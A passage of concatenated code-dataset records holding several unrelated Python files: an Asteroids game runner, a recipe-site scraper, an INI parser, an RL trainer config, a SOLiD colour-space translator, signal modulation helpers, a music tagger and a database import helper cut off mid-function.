self.check_win()\n if not self.__is_start:\n return\n print(\"Spawning ship\")\n random_x = randint(self.__screen_min_x, self.__screen_max_x)\n random_y = randint(self.__screen_min_y, self.__screen_max_y)\n self.__ship.set_x(random_x)\n self.__ship.set_y(random_y)\n self.__screen.draw_ship(self.__ship.return_x(), self.__ship.return_y(), DEFAULT_SHIP_HEADING)\n self.__is_start = False\n\n def speed_up(self):\n \"\"\"\n this method will speed up the ship speed if requested\n :return:\n \"\"\"\n\n print(\"Speeding up!\")\n radians_angle = radians(self.__ship_angle)\n newspeed_x = self.__ship.return_speed_x() + cos(radians_angle)\n newspeed_y = self.__ship.return_speed_y() + sin(radians_angle)\n self.__ship.set_speed_x(newspeed_x)\n self.__ship.set_speed_y(newspeed_y)\n\n def move_ship(self):\n \"\"\"\n this method will change a object location in X,Y axis\n it firsts appends for asteroids_amount times and making new spots,\n the first [new] spot is always the ship spot, and the other ones is the asteroids new spots\n :return: new spot of object in Y axis\n \"\"\"\n\n self.check_win()\n if self.__is_start: # check if its the start of the game, because if yes there will be division by 0\n return\n newspot_x = self.__screen_min_x + (\n self.__ship.return_x() + self.__ship.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n self.__ship.return_y() + self.__ship.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_ship(newspot_x, newspot_y, self.__ship_angle)\n self.__ship.set_x(newspot_x)\n self.__ship.set_y(newspot_y)\n\n # ----ASTEROIDS METHODS----\n\n @staticmethod\n def set_asteroid_speed_spot(obj, random_x, random_y, random_speed_x, random_speed_y):\n \"\"\"\n this method will initialize the asteroid starting spot and speed\n :param obj: asteroid object\n :param random_x: the randomized x spot\n :param random_y: the randomized y spot\n :param random_speed_x: the randomized speed on the X axis\n :param random_speed_y: the randomized speed on the Y axis\n :return:\n \"\"\"\n\n obj.set_x(random_x)\n obj.set_y(random_y)\n obj.set_speed_x(random_speed_x)\n obj.set_speed_y(random_speed_y)\n\n def spawn_asteroids(self):\n \"\"\"\n this method will spawn on the start of the game the asteroids\n :return:\n \"\"\"\n\n if not self.__is_start: # checking if its the start of the game\n return\n for asteroid in range(self.__asteroids_amount):\n random_x = randint(self.__screen_min_x, self.__screen_max_x)\n random_y = randint(self.__screen_min_y, self.__screen_max_y)\n random_speed_x = randint(1, 4)\n random_speed_y = randint(1, 4)\n asteroid_obj = Asteroid(random_x, random_y, random_speed_x, random_speed_y, ASTEROIDS_SIZE)\n self.set_asteroid_speed_spot(asteroid_obj, random_x, random_y, random_speed_x, random_speed_y)\n self.__asteroids_objects.append(asteroid_obj)\n self.__screen.register_asteroid(asteroid_obj, ASTEROIDS_SIZE)\n self.__screen.draw_asteroid(asteroid_obj, asteroid_obj.return_x(), asteroid_obj.return_y())\n print(\"Spawned asteroids\")\n\n @staticmethod\n def new_asteroid_speed(torpedospeed_x, torpedospeed_y, ast_obj):\n \"\"\"\n this method will generate the new speed of the splitted asteroids\n :param torpedospeed_x: the torpedo current speed on the X axis\n :param torpedospeed_y: the torpedo current speed on the Y axis\n :param ast_obj: the asteroid object\n :return: the new coordinates\n \"\"\"\n\n newasteroidspeed_x = (torpedospeed_x + ast_obj.return_speed_x()) / (ast_obj.return_speed_x() ** 2 +\n ast_obj.return_speed_y() ** 2) ** 0.5\n newasteroidspeed_y = -(torpedospeed_y + ast_obj.return_speed_y()) / (ast_obj.return_speed_x() ** 2 +\n ast_obj.return_speed_y() ** 2) ** 0.5\n return newasteroidspeed_x, newasteroidspeed_y\n\n def split_asteroid(self, ast_obj, tor_obj):\n \"\"\"\n this method will split the asteroids to two smaller asteroids or make him disappear\n :param ast_obj: the asteroid object which got hit\n :param tor_obj:\n :return:\n \"\"\"\n\n self.check_win()\n ast_size = ast_obj.return_size()\n self.__screen.unregister_asteroid(ast_obj)\n self.__asteroids_objects.remove(ast_obj)\n if ast_size == 3 or ast_size == 2:\n size = 2 if ast_size == 3 else 1 # if the radius of an asteroid is 3, or 2\n asteroid_new_speed_x, asteroid_new_speed_y = \\\n self.new_asteroid_speed(tor_obj.return_speed_x(), tor_obj.return_speed_y(), ast_obj)\n for i in range(2):\n # splitting to two different directions\n if i == 1:\n asteroid = Asteroid(\n ast_obj.return_x(), ast_obj.return_y(), -asteroid_new_speed_x, -asteroid_new_speed_y, size)\n else:\n asteroid = Asteroid(\n ast_obj.return_x(), ast_obj.return_y(), asteroid_new_speed_x, asteroid_new_speed_y, size)\n self.__screen.register_asteroid(asteroid, size)\n self.__asteroids_objects.append(asteroid)\n\n def check_hit(self, obj):\n \"\"\"\n this method will check if an object (ship, torpedo) got hit,\n and if it does, it will remove the which asteroid got hit\n :param obj: asteroid object\n :return: true if the was an hit and false if wasn't\n \"\"\"\n\n self.check_win()\n hit_or_not = False\n if not obj.return_removed():\n if obj.has_intersection(self.__ship): # checking if the ship has hit an asteroid object\n print(\"[!] Ship hit\")\n self.__screen.show_message(HIT_ASTEROID_TITLE, HIT_ASTEROID)\n self.__screen.remove_life()\n self.__screen.unregister_asteroid(obj)\n self.__asteroids_objects.remove(obj) # we unregistered the asteroid,we also need to remove it from list\n self.__lives -= 1 # the ship was hit\n hit_or_not = True\n for torpedo in self.__torpedo_objects:\n if obj.has_intersection(torpedo): # checking if a torpedo hit an asteroid object\n print(\"[!] Torpedo hit\")\n if self.__is_torpedo_launched:\n self.split_asteroid(obj, torpedo)\n print(\"[!] New asteroids spawned\")\n self.__torpedo_objects.remove(torpedo)\n self.__screen.unregister_torpedo(torpedo)\n if len(self.__torpedo_objects) == 0:\n self.__is_torpedo_launched = False\n self.set_score(obj)\n hit_or_not = True\n return hit_or_not\n\n def move_asteroids(self):\n \"\"\"\n this method will move all asteroids objects, in the same angle\n :return:\n \"\"\"\n\n self.check_win()\n for asteroid_obj in self.__asteroids_objects:\n newspot_x = self.__screen_min_x + (\n asteroid_obj.return_x() + asteroid_obj.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n asteroid_obj.return_y() + asteroid_obj.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_asteroid(asteroid_obj, newspot_x, newspot_y)\n asteroid_obj.set_x(newspot_x)\n asteroid_obj.set_y(newspot_y)\n self.check_hit(asteroid_obj)\n\n # ----TORPEDO METHODS----\n\n def check_torpedo_time(self, tor_obi):\n \"\"\"\n this method will check the torpedo time\n :param tor_obi: torpedo object\n :return: if the the torpedo object was removed\n \"\"\"\n\n if tor_obi.return_life_time() >= 200:\n self.__torpedo_objects.remove(tor_obi)\n self.__screen.unregister_torpedo(tor_obi)\n return True\n return False\n\n def spawn_torpedo(self):\n \"\"\"\n this method will spawn a torpedo after space key has been pressed\n :return: true if a torpedo was spawned\n \"\"\"\n\n self.check_win()\n if len(self.__torpedo_objects) >= 10:\n print(\"[!] Couldn't spawn Torpedo, there is already 10 of them.\")\n return False\n self.__is_torpedo_launched = True\n torpedospeed_x = self.__ship.return_speed_x() + 2 * cos(radians(self.__ship_angle))\n torpedospeed_y = self.__ship.return_speed_y() + 2 * sin(radians(self.__ship_angle))\n torpedo = Torpedo(TORPEDO_RADIUS)\n torpedo.set_speed_x(torpedospeed_x)\n torpedo.set_speed_y(torpedospeed_y)\n torpedo.set_x(self.__ship.return_x())\n torpedo.set_y(self.__ship.return_y())\n torpedo.set_angle(self.__ship_angle)\n self.__screen.register_torpedo(torpedo)\n self.__torpedo_objects.append(torpedo)\n print(\"[!] Spawned Torpedo\")\n return True\n\n def move_torpedo(self):\n \"\"\"\n this method will move each torpedo and remove him if-\n his life time finished\n :return:\n \"\"\"\n\n self.check_win()\n if not self.__is_torpedo_launched:\n return\n for torpedo in self.__torpedo_objects:\n newspot_x = self.__screen_min_x + (\n torpedo.return_x() + torpedo.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n torpedo.return_y() + torpedo.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_torpedo(torpedo, newspot_x, newspot_y, self.__ship_angle)\n torpedo.set_x(newspot_x)\n torpedo.set_y(newspot_y)\n\n\ndef main(amount):\n runner = GameRunner(amount)\n runner.run()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n main(int(sys.argv[1]))\n else:\n main(DEFAULT_ASTEROIDS_NUM)\n","sub_path":"solutions/ex10/asteroids_main.py","file_name":"asteroids_main.py","file_ext":"py","file_size_in_byte":15148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521813307","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 21:04:24 2019\n\n@author: pierre\n\"\"\"\nfrom keep import *\nfrom function_marmiton import *\n# =============================================================================\n# Variables pour la requete\n# =============================================================================\nsearch_str_list=[\"croque madame\",\"pizza carbonara\",\"pate carbonara\",\"Gateaux Chocolat\",\"salade césar\",\"tomates moza\"]\nsearch_str_list=[search_str.replace(\" \", \"-\") for search_str in search_str_list]\nroot_url=\"https://www.marmiton.org/\"\nurl=root_url+'recettes/recherche.aspx'\n\na=[scrap_url(url,{\"aqt\":search_str}) for search_str in search_str_list]\nb=[data_scraping(root_url+url[0][0]) for url in a]\n\nn_per=[3,2,2,8,2,1]\nif len(n_per)==len(search_str_list):\n liste_finale=liste_ingredient(b,n_per)\n create_doc_list(liste_finale)\n create_doc_json(liste_finale)\nelse:\n liste_finale='Erreur de taille'\n\nexport(liste_finale)\n\n\n# =============================================================================\n# Explication Algo :\n# 0- Etablir les paramètres de la recherche\n# 1- Rechercher les differentes recette se rapportant à la recherche\n# 2- Conserver les urls des recettes les plus proche de la recherche\n# 3- Etablir la liste des ingrédients\n# ============================================================================","sub_path":"Source/marmiton_scrapping.py","file_name":"marmiton_scrapping.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171048297","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\eztest\\ini.py\n# Compiled at: 2018-06-21 22:15:50\n\"\"\"Load data from INI file.\nThe INI file format is an informal standard for configuration files for some platforms or software.\nINI files are simple text files with a basic structure composed of sections, properties, and values.\n\ne.g.:\n;comment text\n[people]\nname=value\n\nusage:\na = INI(\"/tmp/example.ini\") # Load INI data from file.\na.get(\"people\") # Get section \"people\".\na.get(\"people\", \"name\") # Get value of property \"name\" under section \"people\".\na.get(\"people\", \"hello\", \"world\") # Get value of property \"hello\" under section \"people\", or default value \"world\" if section or property not found.\n\na.contains(\"people\") # Whether INI file contains section \"people\".\na.contains(\"people\", \"name\") # Whether INI file contains property \"name\" under section \"people\".\n\na.set(\"new section\") # Define section \"new section\".\na.set(\"new section\", \"new property name\", \"new value\") # Define property \"new property name\" and its value under section \"new section\".\n\na.remove(\"new section\", \"new property name\") # Remove property \"new property name\" from section \"new section\".\na.remove(\"new section\") # Remove section \"new section\".\n\na.save() # Save to INI file.\na.save(\"/tmp/new_file.ini\") # Save to /tmp/new_file.ini file.\n\nclass People:\n def __init__(self):\n self.name = None\n\np = People()\na.get(\"people\").to_object(p) # Set p with same properties under section \"people\" in INI file.\na.get(\"people\").contains(\"name\") # Whether section \"people\" contains property \"name\".\na.get(\"people\").get(\"name\") # Get value of property \"name\".\na.get(\"people\").get(\"hello\", \"world\") # Get value of property \"hello\", or default value if not found.\na.get(\"people\").set(\"new property name\", \"new value\") # Define property \"new property name\" and its value\na.get(\"people\").clear() # Clear all properties.\na.get(\"people\").from_object(p) # Set \"people\" section from p object.\n\nCommon escape sequences in INI file.\nSequence Meaning\n\\\\ \\\\ (a single backslash, escaping the escape character)\n\\x00 Null character\n Tab character\n\n Carriage return\n\n Line feed\n\\\\; Semicolon\n\"\"\"\nimport inspect, json, os, re, sys\nfrom .utility import to_boolean\nPROPERTY_TYPES = [\n bin, bool, bytearray, complex, dict, float, hex, int, list, oct, set, str, tuple]\nif sys.version_info <= (2, 7):\n PROPERTY_TYPES.append(basestring, long, unicode)\nif sys.version_info >= (3, 0):\n PROPERTY_TYPES.append(bytes)\n\nclass INI:\n \"\"\"Ini class is used for configuration file. The content in this file should be:\n\n ;comment text\n [section]\n name=value\n You also can view the standard of configuration from \"http://en.wikipedia.org/wiki/INI_file\"\n \"\"\"\n __slots__ = [\n 'file_path', 'sections']\n\n def __init__(self, file_path=None):\n \"\"\"Initialization. Load settings from configuration file.\n\n :param str file_path: configuration file's path.\n \"\"\"\n self.file_path = file_path\n self.sections = []\n if self.file_path:\n if not os.path.abspath(self.file_path):\n self.file_path = os.path.join(os.getcwd(), self.file_path)\n if os.path.exists(self.file_path):\n self._load()\n\n def _load(self):\n \"\"\"Load settings from configuration file.\"\"\"\n with open(self.file_path, 'r') as (f):\n try:\n s = None\n while True:\n line = f.readline()\n if not line:\n break\n line = line.strip()\n if line == '':\n continue\n if line.startswith('[') and line.endswith(']'):\n s = Section(line[1:-1])\n self.sections.append(s)\n elif line.startswith(';'):\n continue\n elif s is not None:\n i = line.find('=')\n if i > 0:\n k = line[0:i].strip()\n if not k:\n continue\n v = line[i + 1:].strip()\n if v == '\\\\0':\n v = None\n elif v.find('\\\\') >= 0:\n nv = ''\n token = None\n for c in v:\n if token:\n token += c\n if token == '\\\\\\\\':\n nv += '\\\\'\n elif token == '\\\\t':\n nv += '\\t'\n elif token == '\\\\r':\n nv += '\\r'\n elif token == '\\\\n':\n nv += '\\n'\n else:\n nv += token\n token = None\n elif c == '\\\\':\n token = c\n else:\n nv += c\n\n if token:\n nv += token\n v = nv\n s.set(k, v)\n\n except Exception as e:\n raise Exception(('Failed to load data: {}').format(str(e)))\n\n return\n\n def set(self, section_name, property_name=None, property_value=None):\n \"\"\"Add/update section or property value.\n\n :param str section_name: section name.\n :param str property_name: property name in section.\n :param property_value: property value in section.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n s1 = Section(section_name)\n self.sections.append(s1)\n\n if property_name is not None:\n s1.set(property_name, property_value)\n return\n\n def contains(self, section_name, property_name=None):\n \"\"\"Whether ini file contains specified section or property name.\n\n :param str section_name: section name.\n :param str property_name: property name in section.\n :return bool: True if section_name or property_name found, otherwise False.\n \"\"\"\n if not section_name:\n return False\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return False\n\n if property_name is None:\n return True\n return s1.contains(property_name)\n\n def get(self, section_name, property_name=None, default_value=None):\n \"\"\"Get section or property value according to section name and property name.\n\n :param str section_name : section name.\n :param str property_name : property name in section.\n :param default_value: default value for property.\n :return Section|str: Section if section_name found and no property_name provided, None if section_name not found;\n Property value if property_name provided and found, otherwise default_value.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return\n\n if property_name is None:\n return s1\n return s1.get(property_name, default_value)\n\n def save(self, file_path=None):\n \"\"\"Save settings into configuration file.\"\"\"\n file_path = file_path or self.file_path\n if not file_path:\n raise ValueError('Please provide file path.')\n with open(file_path, 'w') as (f):\n try:\n for s in self.sections:\n f.write(('[{}]{}').format(s.name, os.linesep))\n for key, value in s.properties.items():\n if isinstance(value, dict):\n value = json.dumps(value)\n elif isinstance(value, list):\n value = (',').join([ str(v) for v in value ])\n elif isinstance(value, set):\n value = (',').join(list(value))\n elif isinstance(value, bytearray) or sys.version_info >= (3,\n 0) and isinstance(value, bytes):\n value = value.decode('utf-8')\n elif value is not None:\n value = str(value)\n if value is None:\n value = '\\\\0'\n else:\n value = value.replace('\\\\', '\\\\\\\\').replace('\\r', '\\\\r').replace('\\n', '\\\\n').replace('\\t', '\\\\t')\n f.write(('{}={}{}').format(key, value, os.linesep))\n\n f.write(os.linesep)\n\n except Exception as e:\n raise Exception(('Failed to write data into file: {}').format(str(e)))\n\n return\n\n def remove(self, section_name, property_name=None):\n \"\"\"Remove section or property.\n\n :param section_name : section name.\n :param property_name : property name in section.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return\n\n if property_name is None:\n self.sections.remove(s1)\n return\n s1.remove(property_name)\n return\n\n\nclass Section:\n \"\"\"Section class, contains section name and its properties.\"\"\"\n __slots__ = [\n 'name', 'properties']\n\n def __init__(self, section_name=None):\n \"\"\"Initialization.\n\n :param str section_name: section name.\n \"\"\"\n self.name = section_name\n self.properties = dict()\n\n def set(self, property_name, property_value=None):\n \"\"\"Add/update property\n\n :param str property_name: property name.\n :param property_value: property value.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n self.properties[property_name] = property_value\n\n def contains(self, property_name):\n \"\"\"Whether section contains specified property name.\n\n :param str property_name: property name.\n :return bool: True if Section contains the property, otherwise False.\n \"\"\"\n if not property_name:\n return False\n return property_name in self.properties\n\n def remove(self, property_name):\n \"\"\"Remove a property by property name.\n\n :param str property_name: property name.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n if property_name in self.properties:\n del self.properties[property_name]\n\n def get(self, property_name, default_value=None):\n \"\"\"Get property value by property name.\n\n :param str property_name: property name.\n :param default_value: return default value if it does not exist.\n :return str: property value if found, otherwise returns default_value.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n return self.properties.get(property_name, default_value)\n\n def clear(self):\n \"\"\"Clear all properties.\"\"\"\n self.properties = dict()\n\n def to_object(self, obj):\n \"\"\"Copy values of property in section to property in the object.\n\n :param obj: the object which should be evaluated.\n :return dict: a dictionary with keys don't exist in obj.\n \"\"\"\n if obj is None:\n raise ValueError('obj can not be None.')\n result = dict()\n for key, value in self.properties.items():\n if hasattr(obj, key):\n attr = getattr(obj, key)\n t = type(attr)\n if t is bin:\n v = bin(int(value, 2))\n elif t is bool:\n v = to_boolean(value)\n elif t is bytearray:\n v = bytearray(value, encoding='utf-8')\n elif t is complex:\n g = re.match('^(-?\\\\d+)(([\\\\+\\\\-]\\\\d+)[ij])?$', value)\n if g:\n v = complex(int(g.group(1)), int(g.group(3)))\n else:\n v = value\n elif t is dict:\n v = json.loads(value)\n elif t is float:\n v = float(value)\n elif t is hex:\n v = hex(int(value, 16))\n elif t is int:\n v = int(value)\n elif t is list:\n v = value.split(',')\n elif t is set:\n v = set(value.split(','))\n elif t is tuple:\n v = tuple(value.split(','))\n elif t is oct:\n v = oct(int(value, 8))\n elif t is str:\n v = str(value)\n elif sys.version_info <= (2, 7):\n if t is long:\n v = long(value)\n elif t is unicode:\n v = unicode(value, encoding='utf-8')\n else:\n v = value\n elif sys.version_info >= (3, 0) and t is bytes:\n v = bytes(value, encoding='utf-8')\n else:\n v = value\n setattr(obj, key, v)\n else:\n result[key] = value\n\n return obj\n\n def from_object(self, obj):\n \"\"\"Copy values from object.\n\n :param obj: object.\n :return Section: self.\n \"\"\"\n if obj is None:\n raise ValueError('obj can not be None.')\n for key, value in inspect.getmembers(obj):\n if type(value) in PROPERTY_TYPES:\n self.set(key, value)\n\n return self","sub_path":"pycfiles/eztest-2.0.1-py2.7/ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":15332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157177167","text":"\"\"\"Trainer and configuration for SVG(inf).\"\"\"\nfrom ray.rllib import SampleBatch\nfrom ray.rllib.optimizers import PolicyOptimizer\nfrom ray.rllib.utils import override\n\nfrom raylab.agents import Trainer\nfrom raylab.agents import with_common_config\nfrom raylab.utils.replay_buffer import NumpyReplayBuffer\nfrom raylab.utils.replay_buffer import ReplayField\n\nfrom .policy import SVGInfTorchPolicy\n\n\nDEFAULT_CONFIG = with_common_config(\n {\n # === Optimization ===\n # Weight of the fitted V loss in the joint model-value loss\n \"vf_loss_coeff\": 1.0,\n # Clip gradient norms by this value\n \"max_grad_norm\": 10.0,\n # Clip importance sampling weights by this value\n \"max_is_ratio\": 5.0,\n # Interpolation factor in polyak averaging for target networks.\n \"polyak\": 0.995,\n # PyTorch optimizers to use\n \"torch_optimizer\": {\n \"on_policy\": {\"type\": \"Adam\", \"lr\": 1e-3},\n \"off_policy\": {\"type\": \"Adam\", \"lr\": 1e-3},\n },\n # Model and Value function updates per step in the environment\n \"updates_per_step\": 1.0,\n # === Replay buffer ===\n # Size of the replay buffer.\n \"buffer_size\": 500000,\n # === Regularization ===\n # Options for adaptive KL coefficient. See raylab.utils.adaptive_kl\n \"kl_schedule\": {},\n # === Network ===\n # Size and activation of the fully connected networks computing the logits\n # for the policy, value function and model. No layers means the component is\n # linear in states and/or actions.\n \"module\": {\"type\": \"SVGModule\", \"torch_script\": True},\n # === Exploration Settings ===\n # Default exploration behavior, iff `explore`=None is passed into\n # compute_action(s).\n # Set to False for no exploration behavior (e.g., for evaluation).\n \"explore\": True,\n # Provide a dict specifying the Exploration object's config.\n \"exploration_config\": {\n # The Exploration class to use. In the simplest case, this is the name\n # (str) of any class present in the `rllib.utils.exploration` package.\n # You can also provide the python class directly or the full location\n # of your class (e.g. \"ray.rllib.utils.exploration.epsilon_greedy.\n # EpsilonGreedy\").\n \"type\": \"raylab.utils.exploration.StochasticActor\",\n },\n # === Evaluation ===\n # Extra arguments to pass to evaluation workers.\n # Typical usage is to pass extra args to evaluation env creator\n # and to disable exploration by computing deterministic actions\n \"evaluation_config\": {\"explore\": True},\n # === Common config defaults ===\n \"num_workers\": 0,\n \"rollout_fragment_length\": 1,\n \"batch_mode\": \"complete_episodes\",\n \"train_batch_size\": 128,\n }\n)\n\n\nclass SVGInfTrainer(Trainer):\n \"\"\"Single agent trainer for SVG(inf).\"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n _name = \"SVG(inf)\"\n _default_config = DEFAULT_CONFIG\n _policy = SVGInfTorchPolicy\n\n @override(Trainer)\n def _init(self, config, env_creator):\n self._validate_config(config)\n self.workers = self._make_workers(\n env_creator, self._policy, config, num_workers=config[\"num_workers\"]\n )\n # Dummy optimizer to log stats since Trainer.collect_metrics is coupled with it\n self.optimizer = PolicyOptimizer(self.workers)\n\n policy = self.get_policy()\n policy.set_reward_from_config(config[\"env\"], config[\"env_config\"])\n\n self.replay = NumpyReplayBuffer(\n policy.observation_space, policy.action_space, config[\"buffer_size\"]\n )\n self.replay.add_fields(ReplayField(SampleBatch.ACTION_LOGP))\n self.replay.seed(config[\"seed\"])\n\n @override(Trainer)\n def _train(self):\n worker = self.workers.local_worker()\n policy = worker.get_policy()\n\n samples = worker.sample()\n self.optimizer.num_steps_sampled += samples.count\n for row in samples.rows():\n self.replay.add(row)\n stats = policy.get_exploration_info()\n\n with policy.learning_off_policy():\n for _ in range(int(samples.count * self.config[\"updates_per_step\"])):\n batch = self.replay.sample(self.config[\"train_batch_size\"])\n off_policy_stats = policy.learn_on_batch(batch)\n self.optimizer.num_steps_trained += batch.count\n stats.update(off_policy_stats)\n\n stats.update(policy.learn_on_batch(samples))\n\n return self._log_metrics(stats)\n","sub_path":"raylab/agents/svg/inf/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"553513871","text":"class Translate(object):\n \"\"\"translate solid csfasta file to fasta file\"\"\"\n def __init__(self, csfasta, fasta, qual = None, cutoff = 12, min_len = 25):\n self.csfasta = csfasta\n self.fasta = fasta\n self.qual = qual\n self.cutoff = cutoff\n self.min_len = min_len\n self.color_space = {\n 'A': {\n '0': 'A',\n '1': 'C',\n '2': 'G',\n '3': 'T'\n },\n 'G': {\n '0': 'G',\n '1': 'T',\n '2': 'A',\n '3': 'C'\n },\n 'C': {\n '0': 'C',\n '1': 'A',\n '2': 'T',\n '3': 'G'\n },\n 'T': {\n '0': 'T',\n '1': 'G',\n '2': 'C',\n '3': 'A'\n }\n }\n\n def translate(self):\n \"\"\"\n if ft is True, filte low quality base when translate\n \"\"\"\n fin = open(self.csfasta, 'r')\n fo = open(self.fasta, 'w')\n if self.qual:\n fqual = open(self.qual, 'r')\n\n for line in fin:\n if self.qual:\n qline = fqual.readline()\n if line.startswith(\"#\"):\n continue\n elif line.startswith(\">\"):\n fo.write(line)\n else:\n line = line.strip()\n if self.qual:\n qline = qline.strip()\n fo.write(self._translate_read(line, qual = qline, cutoff = self.cutoff, min_len = self.min_len))\n else:\n fo.write(self._translate_read(line))\n fo.write(\"\\n\")\n fin.close()\n fo.close()\n\n def _translate_read(self, read, **filte):\n seq = [read[0]]\n for b in read[1:]:\n if b == \".\":\n break\n seq.append(self.color_space[seq[-1]][b])\n end = 1\n if filte:\n qual = filte.get(\"qual\", [])\n cutoff = filte.get(\"cutoff\", 12)\n min_len = filte.get(\"min_len\", 25)\n for q in qual:\n if q < cutoff:\n break\n end += 1\n seq = seq[:end]\n if len(seq) < min_len:\n seq = []\n return \"\".join(seq)\n","sub_path":"pysolidqa/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572286087","text":"import random\n\n\ndef solution(s):\n score = 0\n while len(s) > 1:\n r1 = random.randint(0, len(s)-1)\n r2 = r1\n while r2 == r1:\n r2 = random.randint(0, len(s)-1)\n tmp1 = s[r1]\n tmp2 = s[r2]\n score += tmp1 * tmp2\n s.append(tmp1 + tmp2)\n s.remove(tmp1) # 删除找到第一个匹配项\n s.remove(tmp2)\n print(s)\n return score\n\n\nif __name__ == '__main__':\n\n stones = [1, 2, 3, 4, 5, 6, 7, 8, 8, 8, 8]\n\n print(solution(stones))\n","sub_path":"contest/stone_game.py","file_name":"stone_game.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87609264","text":"import numpy\nimport math\nimport operator\n\n# Methods common to both the transmitter and receiver\ndef modulate(fc, samplerate, samples):\n '''\n A modulator that multiplies samples with a local carrier \n of frequency fc, sampled at samplerate\n '''\n\n s = len(samples)\n mod_samples = numpy.empty(s)\n for n in range(s):\n carrier_signal_sample = math.cos(2 * math.pi * fc / samplerate * n)\n # carrier_signal_sample = math.cos(fc / samplerate * n)\n mod_samples[n] = samples[n] * carrier_signal_sample\n # mod_samples[n] = 0\n\n return mod_samples\n\n\ndef demodulate(fc, samplerate, samples):\n '''\n A demodulator that performs quadrature demodulation\n '''\n\n s = len(samples)\n demod_samples = numpy.empty(s)\n for n in range(s):\n\n #change the inverse_sample to use exponential\n inverse_sample = math.cos(2 * math.pi * fc / samplerate * n)\n # inverse_sample = math.exp(1j * 2 * math.pi * fc / samplerate * n)\n demod_samples[n] = samples[n] * inverse_sample\n\n omega_cut = math.pi * fc / samplerate\n lpf_samples = lpfilter(demod_samples, omega_cut)\n\n return lpf_samples\n\n\ndef lpfilter(samples_in, omega_cut):\n '''\n A low-pass filter of frequency omega_cut.\n '''\n\n # set the filter unit sample response\n L = 50\n filter_length = L * 2 + 1\n unit_sample_response = numpy.empty(filter_length)\n for n in range(-L, L + 1):\n if n != 0:\n val = math.sin(omega_cut * n) / (math.pi * n)\n else:\n val = omega_cut / math.pi\n unit_sample_response[n] = val\n\n # compute the demodulated samples\n s = len(samples_in)\n lpf_samples = numpy.empty(s)\n for n in range(s):\n input_samples = numpy.empty(filter_length)\n i = 0\n for m in range(n-L, n+L+1):\n if m < 0 or m >= s:\n input_samples[i] = 0\n else:\n input_samples[i] = samples_in[m]\n i += 1\n lpf_samples[n] = numpy.dot(unit_sample_response, input_samples[::-1])\n\n return numpy.absolute(lpf_samples)\n\n","sub_path":"milestone3_starter_mod_demod/common_txrx_mil3.py","file_name":"common_txrx_mil3.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612719684","text":"from ripper.apolloRipper.model.song import Song\nimport logging\n\nfrom ripper.apolloRipper.tagging.spotify_meta_retriever import spotify_metaRetriever\n\nclass Tagger():\n\n logger = logging.getLogger(\"TaggerLogger\")\n spotifyRetriever = spotify_metaRetriever()\n\n def __init__(self):\n ch = logging.StreamHandler()\n ch.setLevel(logging.WARNING)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n fhdlr = logging.FileHandler('logs/taggerLog.log')\n fhdlr.setLevel(logging.DEBUG)\n fhdlr.setFormatter(formatter)\n\n self.logger.addHandler(fhdlr)\n self.logger.addHandler(ch)\n\n def tag_song(self, song):\n return self.tag_spotify(song)\n\n def tag_spotify(self, song):\n try:\n metaData = self.spotifyRetriever.retrieve_metadata(song)\n song.fillMetadta(metaData)\n return 0\n except AttributeError as err:\n self.logger.warning(\"Failed to tag: \" + song.filename)\n return -1\n\n","sub_path":"ripper/apolloRipper/tagging/tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556237469","text":"'''\nPipelineDatabase.py - utility functions for working with a database\n===================================================================\n\n'''\n\nimport os\nimport CGATPipelines.Pipeline as P\n\n# set from calling module\nPARAMS = {}\n\n\ndef importFromIterator(\n outfile,\n tablename,\n iterator,\n columns=None,\n indices=None):\n '''import data in *iterator* into *tablename* via temporary file.\n\n '''\n\n tmpfile = P.getTempFile(\".\")\n\n if columns:\n keys, values = 